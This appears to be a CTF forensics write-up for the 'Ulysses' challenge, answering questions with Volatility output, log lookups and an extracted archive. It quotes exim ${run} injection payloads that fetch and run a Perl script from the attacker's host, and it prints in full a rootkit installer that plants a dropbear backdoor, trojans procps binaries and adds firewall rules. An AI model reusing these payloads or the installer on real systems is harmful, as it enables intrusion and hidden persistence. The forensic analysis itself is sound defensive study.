Ulysses - Memory Image Forensics
The attacker was performing a Brute Force attack. What account triggered the alert?
- Open victoria-v8.sda1.img in access data view /var/auth.log
- You will see answerHow many were failed attempts there?
- You need to count "failed password" in log fileWhat kind of system runs on the targeted server?
- The hint said, Google "Identify Linux system"
- /etc/issueWhat is the victim's IP address?
$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190 udevd/776
UDP 0.0.0.0 : 111 0.0.0.0 : 0 portmap/1429
TCP 0.0.0.0 : 111 0.0.0.0 : 0 LISTEN portmap/1429
UDP 0.0.0.0 : 769 0.0.0.0 : 0 rpc.statd/1441
UDP 0.0.0.0 :38921 0.0.0.0 : 0 rpc.statd/1441
TCP 0.0.0.0 :39296 0.0.0.0 : 0 LISTEN rpc.statd/1441
UDP 0.0.0.0 : 68 0.0.0.0 : 0 dhclient3/1624
UNIX 5069 dhclient3/1624
UNIX 4617 rsyslogd/1661 /dev/log
UNIX 4636 acpid/1672 /var/run/acpid.socket
UNIX 4638 acpid/1672
TCP :: : 22 :: : 0 LISTEN sshd/1687
TCP 0.0.0.0 : 22 0.0.0.0 : 0 LISTEN sshd/1687
TCP :: : 25 :: : 0 LISTEN exim4/1942
TCP 0.0.0.0 : 25 0.0.0.0 : 0 LISTEN exim4/1942
UNIX 5132 login/1990
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 :56955 192.168.56.1 : 8888 ESTABLISHED nc/2169
192.168.56.102What are the attacker's two IP addresses? Format: comma-separated in ascending order
$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190 udevd/776
UDP 0.0.0.0 : 111 0.0.0.0 : 0 portmap/1429
TCP 0.0.0.0 : 111 0.0.0.0 : 0 LISTEN portmap/1429
UDP 0.0.0.0 : 769 0.0.0.0 : 0 rpc.statd/1441
UDP 0.0.0.0 :38921 0.0.0.0 : 0 rpc.statd/1441
TCP 0.0.0.0 :39296 0.0.0.0 : 0 LISTEN rpc.statd/1441
UDP 0.0.0.0 : 68 0.0.0.0 : 0 dhclient3/1624
UNIX 5069 dhclient3/1624
UNIX 4617 rsyslogd/1661 /dev/log
UNIX 4636 acpid/1672 /var/run/acpid.socket
UNIX 4638 acpid/1672
TCP :: : 22 :: : 0 LISTEN sshd/1687
TCP 0.0.0.0 : 22 0.0.0.0 : 0 LISTEN sshd/1687
TCP :: : 25 :: : 0 LISTEN exim4/1942
TCP 0.0.0.0 : 25 0.0.0.0 : 0 LISTEN exim4/1942
UNIX 5132 login/1990
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 :56955 192.168.56.1 : 8888 ESTABLISHED nc/2169
192.168.56.1,192.168.56.101What is the "nc" service PID number that was running on the server?
$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_pslist
Offset Name Pid PPid Uid Gid DTB Start Time
---------- -------------------- --------------- --------------- --------------- ------ ---------- ----------
0xcf42f900 init 1 0 0 0 0x0f4b8000 2011-02-06 12:04:09 UTC+0000
0xcf42f4e0 kthreadd 2 0 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42f0c0 migration/0 3 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42eca0 ksoftirqd/0 4 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e880 watchdog/0 5 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e460 events/0 6 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e040 khelper 7 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1a40 kblockd/0 39 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1200 kacpid 41 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf45d140 kacpi_notify 42 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf46c940 kseriod 86 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf43f100 pdflush 123 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d980 pdflush 124 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d560 kswapd0 125 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf43f520 aio/0 126 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45c4e0 ksuspend_usbd 581 2 0 0 ---------- 2011-02-06 12:04:14 UTC+0000
0xcf48d1c0 khubd 582 2 0 0 ---------- 2011-02-06 12:04:14 UTC+0000
0xcf46d9c0 ata/0 594 2 0 0 ---------- 2011-02-06 12:04:15 UTC+0000
0xcf802a00 ata_aux 595 2 0 0 ---------- 2011-02-06 12:04:15 UTC+0000
0xcf43e080 scsi_eh_0 634 2 0 0 ---------- 2011-02-06 12:04:17 UTC+0000
0xcf45c0c0 kjournald 700 2 0 0 ---------- 2011-02-06 12:04:18 UTC+0000
0xcf46d5a0 udevd 776 1 0 0 0x0f5b2000 2011-02-06 12:04:21 UTC+0000
0xce978620 kpsmoused 1110 2 0 0 ---------- 2011-02-06 12:04:27 UTC+0000
0xce9796a0 portmap 1429 1 1 1 0x0eddf000 2011-02-06 12:04:35 UTC+0000
0xce973b00 rpc.statd 1441 1 102 0 0x0f8b3000 2011-02-06 12:04:35 UTC+0000
0xcf45c900 dhclient3 1624 1 0 0 0x0ec3d000 2011-02-06 12:04:39 UTC+0000
0xce972660 rsyslogd 1661 1 0 0 0x0e7ed000 2011-02-06 12:04:40 UTC+0000
0xcf43ece0 acpid 1672 1 0 0 0x0f8a8000 2011-02-06 12:04:40 UTC+0000
0xce979ac0 sshd 1687 1 0 0 0x0fa65000 2011-02-06 12:04:41 UTC+0000
0xcf45cd20 exim4 1942 1 101 103 0x0e7bc000 2011-02-06 12:04:44 UTC+0000
0xcf803a80 cron 1973 1 0 0 0x0f815000 2011-02-06 12:04:45 UTC+0000
0xcfaad720 login 1990 1 0 0 0x0eecf000 2011-02-06 12:04:45 UTC+0000
0xcf48c560 getty 1992 1 0 0 0x0ea31000 2011-02-06 12:04:45 UTC+0000
0xcf803240 getty 1994 1 0 0 0x0f671000 2011-02-06 12:04:45 UTC+0000
0xcf4a1620 getty 1996 1 0 0 0x0f838000 2011-02-06 12:04:45 UTC+0000
0xcf46cd60 getty 1998 1 0 0 0x0f83d000 2011-02-06 12:04:45 UTC+0000
0xcf4a0180 getty 2000 1 0 0 0x0e89e000 2011-02-06 12:04:45 UTC+0000
0xcf8021c0 bash 2042 1990 0 0 0x0eecc000 2011-02-06 14:04:38 UTC+0000
0xcfaacee0 sh 2065 1 0 0 0x0f517000 2011-02-06 14:07:15 UTC+0000
0xcfaac280 memdump 2168 2042 0 0 0x08088000 2011-02-06 14:42:27 UTC+0000
0xcf43e8c0 nc 2169 2042 0 0 0x08084000 2011-02-06 14:42:27 UTC+0000What service was exploited to gain access to the system?
# You can see log in /var/log/exim4
$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_pslist
exim4What is the CVE number of exploited vulnerability?
# Hint said me 'Check logs carefully, then use your Google-fu'. I found string 'smtp' contain mainlog. So I googled 'exim4 CVE'. And filtered 'smtp'.During this attack, the attacker downloaded two files to the server. What are they?
# look carefully on rejectlog
${run{/bin/sh -c "exec /bin/sh -c 'rm /tmp/rk.tar; sleep 1000'"}}
${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl ; sleep 1000000'"}}
c.pl,rk.tarWhat are the two port numbers involved in the process of data exfiltration? Format: comma-separated in ascending order
$ python volatility/vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
UNIX 2190 udevd/776
UDP 0.0.0.0 : 111 0.0.0.0 : 0 portmap/1429
TCP 0.0.0.0 : 111 0.0.0.0 : 0 LISTEN portmap/1429
UDP 0.0.0.0 : 769 0.0.0.0 : 0 rpc.statd/1441
UDP 0.0.0.0 :38921 0.0.0.0 : 0 rpc.statd/1441
TCP 0.0.0.0 :39296 0.0.0.0 : 0 LISTEN rpc.statd/1441
UDP 0.0.0.0 : 68 0.0.0.0 : 0 dhclient3/1624
UNIX 5069 dhclient3/1624
UNIX 4617 rsyslogd/1661 /dev/log
UNIX 4636 acpid/1672 /var/run/acpid.socket
UNIX 4638 acpid/1672
TCP :: : 22 :: : 0 LISTEN sshd/1687
TCP 0.0.0.0 : 22 0.0.0.0 : 0 LISTEN sshd/1687
TCP :: : 25 :: : 0 LISTEN exim4/1942
TCP 0.0.0.0 : 25 0.0.0.0 : 0 LISTEN exim4/1942
UNIX 5132 login/1990
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 :56955 192.168.56.1 : 8888 ESTABLISHED nc/2169
4444,8888Which port did the attacker try to block on the firewall?
# By viewing this log '${run{/bin/sh -c "exec /bin/sh -c 'rm /tmp/rk.tar; sleep 1000'"}}', we can know the tar file can remain in tmp file
# let's dump tar file from access data.
$ mv Untitled0 lol.tar
$ tar -xvf lol.tar
$ cd rk
$ cat install.sh
#!/bin/bash
IFS='
'
umask 0022
if [ ! -f vars.sh ]
then
echo "Can't find vars.sh, exiting"
exit
fi
source vars.sh
mkdir -p $rk_home_dir
cp dropbear $rk_home_dir
chmod +x $rk_home_dir/dropbear
chattr +ia $rk_home_dir/dropbear
cp busybox $rk_home_dir
chmod +x $rk_home_dir/busybox
chattr +ia $rk_home_dir/busybox
cp mig $rk_home_dir
chattr +ia $rk_home_dir/mig
if [ -x /etc/init.d/boot.local ]
then
echo "autostart in /etc/init.d/boot.local"
echo "$rk_home_dir/dropbear " >> /etc/init.d/boot.local
echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/init.d/boot.local
fi
if [ -x /etc/rc.d/rc.local ]
then
echo "autostart in /etc/rc.d/rc.local"
echo "$rk_home_dir/dropbear">> /etc/rc.d/rc.local
echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/rc.d/rc.local
fi
dtest=`which update-rc.d`
if [ ! -z $dtest ]
then
echo "debian like system"
echo "$rk_home_dir/dropbear " >> /etc/init.d/xfs3
echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/init.d/xfs3
chmod +x /etc/init.d/xfs3
update-rc.d xfs3 defaults
fi
$rk_home_dir/dropbear
#################################### procps
for l in `ls procps`
do
o=`which $l`
if [ ! -z $o ]
then
chattr -ia $o
rm -f $o
cp procps/$l $o
chattr +ia $o
fi
done
mkdir -p /usr/include/mysql
echo dropbear >> /usr/include/mysql/mysql.hh1
if [ -f /sbin/ttymon ]
then
echo "WARNING: SHV5/SHV4 RK DETECTED"
chattr -ia /sbin/ttymon /sbin/ttyload
rm -f /sbin/ttymon /sbin/ttyload
kill -9 `pidof ttymon`
kill -9 `pidof ttyload`
fi
iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP
echo
echo
echo
echo "Don't forget to:"
echo "cd .."
echo "rm -rf rk rk.tbz2"Last updated
Was this helpful?